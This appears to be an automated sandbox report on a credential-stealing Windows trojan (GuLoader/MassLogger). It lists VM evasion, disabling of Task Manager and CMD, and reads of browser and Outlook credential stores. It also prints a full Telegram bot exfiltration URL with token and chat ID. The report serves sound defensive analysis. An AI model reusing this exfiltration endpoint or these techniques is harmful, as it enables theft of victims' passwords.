Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594608	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594047	Jump to behavior

Source: 6ZoBPR3isG.exe, 00000000.00000002.1649332633.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#4&
Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	API call chain: ExitProcess graph end node			graph_0-4589
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	API call chain: ExitProcess graph end node			graph_0-4746

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401E49

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_73F91B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73F91B5F

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Process created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"

Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Users\user\Desktop\6ZoBPR3isG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034A5

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables CMD prompt

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	31 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6ZoBPR3isG.exe	42%	Virustotal		Browse
6ZoBPR3isG.exe	61%	ReversingLabs	Win32.Trojan.GuLoader
6ZoBPR3isG.exe	100%	Avira	HEUR/AGEN.1337946

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.telegram.org.S	0%	Avira URL Cloud	safe
https://api.telegram	0%	Avira URL Cloud	safe
https://api.telegram.orgL	0%	Avira URL Cloud	safe
http://checkip.dyndn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.google.com	172.217.16.206	true	false	high
drive.usercontent.google.com	172.217.16.129	true	false	high
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/M	6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org	6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003420D000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382	6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/U	6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.orgL	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org.S	6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	6ZoBPR3isG.exe	false		high
https://www.google.com	6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram	6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/0	6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndn	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.217.16.206	drive.google.com	United States	15169	GOOGLEUS	false
172.217.16.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588191
Start date and time:	2025-01-10 22:29:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6ZoBPR3isG.exe renamed because original name is a hash value
Original Sample Name:	e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/8@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 188 Number of non-executed functions: 111
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:31:41	API Interceptor	115365x Sleep call for process: 6ZoBPR3isG.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
104.21.80.1	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/0hqe/
	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe
132.226.247.73	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	7cYDC0HciP.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=	Get hash	malicious	Unknown	Browse	13.107.246.45
	7cYDC0HciP.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	28uMwHvbTD.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	8qQwTWK3jx.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	1018617432866721695.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	hm8dCK5P5A.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
checkip.dyndns.com	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
